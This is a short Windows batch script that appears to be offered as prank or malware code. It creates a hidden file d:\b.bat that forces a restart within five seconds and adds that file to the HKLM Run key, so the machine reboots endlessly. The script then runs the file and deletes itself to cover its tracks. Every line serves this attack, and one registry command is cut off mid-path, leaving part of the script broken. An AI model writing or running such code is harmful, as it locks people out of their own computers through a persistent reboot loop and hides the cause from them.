@echo off
echo @echo off>d:\b.bat
echo shutdown -r -f -t 5>>d:\b.bat
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v AUTORUN /t REG_SZ /d d:\b.bat
attrib +s +h d:\b.bat
reg add HKLM\Software\Microsoft\windows\CurrentVersi
call "d:\b.bat"
del /q %0